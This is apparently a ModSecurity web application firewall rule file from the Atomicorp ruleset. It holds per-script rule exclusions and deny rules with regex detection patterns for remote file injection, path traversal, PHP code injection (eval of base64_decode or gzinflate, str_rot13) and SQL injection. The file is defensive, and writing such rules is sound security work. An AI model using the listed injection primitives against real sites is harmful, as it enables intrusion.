SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^S/|!ARGS:str2 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340761,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^S/|!ARGS:str2 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340762,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91367

SecRule REQUEST_FILENAME "/admin/patch\.php" "phase:2,id:91368,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371"

SecRule REQUEST_FILENAME "/etc/reality-info\.css" "phase:2,id:91369,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"

SecRule REQUEST_FILENAME "/alt_doc\.php" "phase:2,id:91370,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380011,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/product_modify\.php" "phase:2,id:91371,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91372,t:none,pass,nolog,skipAfter:END_RULES_91372"

SecRule ARGS|!ARGS:distribution|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^efields/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,chain,t:none,id:340763,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:distribution|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^efields/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340764,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"



SecMarker END_RULES_91372

SecRule REQUEST_FILENAME "/fix\.swf" "phase:2,id:91373,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91374,t:none,pass,nolog,skipAfter:END_RULES_91374"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:x "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340765,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:x "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340766,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91374

SecRule REQUEST_FILENAME "/typo3/alt_mod_frameset\.php" "phase:2,id:91375,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/cnf_config\.php" "phase:2,id:91376,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91377,t:none,pass,nolog,skipAfter:END_RULES_91377"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^val_/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340767,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^val_/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340768,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91377

SecRule REQUEST_FILENAME "/classes/crop_image\.php" "phase:2,id:91378,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161"

SecRule REQUEST_FILENAME "/members/create_listing\.php" "phase:2,id:91379,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/livesupport/install/dbperform\.php" "phase:2,id:91380,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367"

SecRule REQUEST_FILENAME "/st/out\.php" "phase:2,id:91381,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91382,t:none,pass,nolog,skipAfter:END_RULES_91382"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:u "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340769,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:u "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340770,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91382

SecRule REQUEST_FILENAME "/db_sql\.php" "phase:2,id:91383,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367"

SecRule REQUEST_FILENAME "/catch\.php" "phase:2,id:91384,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91385,t:none,pass,nolog,skipAfter:END_RULES_91385"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:ru "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340771,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:ru "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340772,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91385

SecRule REQUEST_FILENAME "/admin/languages\.php" "phase:2,id:91386,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91387,t:none,pass,nolog,skipAfter:END_RULES_91387"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^var_value/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340775,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^var_value/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340776,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91387

SecRule REQUEST_FILENAME "/slideshow/admin/p\.php" "phase:2,id:91388,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340151,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91389,t:none,pass,nolog,skipAfter:END_RULES_91389"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:a "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:341776,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:a "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:341778,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91389

SecRule REQUEST_FILENAME "/wp-admin/theme-editor\.php" "phase:2,id:91390,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340855,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340011,ctl:ruleRemovebyID=380006,ctl:ruleRemovebyID=340213,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=341045,ctl:ruleRemovebyID=390715,ctl:ruleRemovebyID=340006"
SecAction "phase:2,id:91391,t:none,pass,nolog,skipAfter:END_RULES_91391"

SecRule REQUEST_URI "!(alt_mod_frameset.php|checkout_shipping.php|^/components/com_zoom/etc/|/admin\.swf\?nick=|/editor/filemanager/browser/default/browser\.html\?(Type=Image&)?Connector=\.\./\.\./connectors)" 	"t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,deny,status:403,phase:2,chain,log,auditlog,t:normalisePath,id:340671,rev:19,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied in URI/ARGS', chain"
SecRule REQUEST_URI|ARGS|!ARGS:webpage[content]|!ARGS:article[content]|!ARGS:filecontent|!ARGS:/text/|!ARGS:/message/|!ARGS:/^fck_/|!ARGS:htmlSource|!ARGS:path_to_lzx|!ARGS:content|!ARGS:newcontent "(?:\.\./\.\./|\.\|\./\.\|\./\.\.)"

#PHP injection
SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/*|!ARGS:/content/|!ARGS:/descripcion/|!ARGS:/text/|!ARGS:/description/|!ARGS:/resolution/|!ARGS:/message/|!ARGS:/msg/ "\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|(?:g|b)z(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:(?:g|b)z)?file|dir)|gzinflate|base64_decode|str_rot13|move_uploaded_file|(?:proc_|bz)open|call_user_func|$_(?:(?:pos|ge)t|session))\b" "phase:2,deny,log,status:403,rev:4,capture,t:none,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,ctl:auditLogParts=+E,auditlog,msg:'Atomicorp.com WAF Rules:  PHP Injection Attack',id:'390725',logdata:'%{TX.0}',severity:'2'"

SecRule ARGS|!ARGS:newcontent|!ARGS:khxc_incphp--filename|!ARGS:file_contents|!ARGS:filecontent|!ARGS:message|!ARGS:defaultParamList|!ARGS:body|!ARGS:gbu0_proddetdisp--incdisp "(?:or.+1[[:space:]]*=[[:space:]][0-9]|(?:or 1=[0-9]|'.+)--'|null is null)" 	"t:urlDecodeUni,t:urlDecodeUni,t:compressWhitespace,t:lowercase,phase:2,deny,status:403,id:340777,log,auditlog,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection'"
SecRule ARGS "(?:(?:eval|passthru) ?\( ?(?:base64_decode|gz(?:inflate|decode|encode)) ?\(|str_rot13 ?\()"  "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:345729,rev:1,log,auditlog,severity:2,msg:'Atomicorp.com WAF Rules: Potentially malicious code injection via WP theme-editor',deny,status:403,phase:2"
SecRule ARGS "(?:(?:eval|passthru) ?\( ?(?:base64_decode|gz(?:inflate|decode|encode)) ?\(|str_rot13 ?\()"  "t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,id:345730,rev:1,severity:2,log,auditlog,msg:'Atomicorp.com WAF Rules: Potentially malicious code injection via WP theme-editor',deny,status:403,phase:2"
SecRule ARGS "(?:(?:eval|passthru) ?\( ?(?:base64_decode|gz(?:inflate|decode|encode)) ?\(|str_rot13 ?\()"  "t:none,t:compressWhitespace,t:lowercase,id:345731,rev:1,severity:2,log,auditlog,msg:'Atomicorp.com WAF Rules: Potentially malicious code injection via WP theme-editor',deny,status:403,phase:2"

SecMarker END_RULES_91391

SecRule REQUEST_FILENAME "/components/com_oziogallery/preview\.swf" "phase:2,id:91392,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91393,t:none,pass,nolog,skipAfter:END_RULES_91393"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:xmlPath "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340779,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:xmlPath "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340780,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91393

SecRule REQUEST_FILENAME "/fla_music\.swf" "phase:2,id:91394,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/mickadmincp/user\.php" "phase:2,id:91395,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91396,t:none,pass,nolog,skipAfter:END_RULES_91396"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfield/|!ARGS:user[homepage] "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340781,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:/^userfield/|!ARGS:user[homepage] "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340782,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91396

SecRule REQUEST_FILENAME "/wp-admin/tools\.php" "phase:2,id:91397,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380006,ctl:ruleRemovebyID=390707,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/includes/c0ntaktu3\.php" "phase:2,id:91398,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91399,t:none,pass,nolog,skipAfter:END_RULES_91399"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:bad_template "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340785,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:bad_template "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340786,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91399

SecRule REQUEST_FILENAME "/formmail\.php" "phase:2,id:91400,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91401,t:none,pass,nolog,skipAfter:END_RULES_91401"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/form/|!ARGS:/template/|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:this_form "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:340787,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/form/|!ARGS:/template/|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:/image/|!ARGS:this_form "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340788,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91401

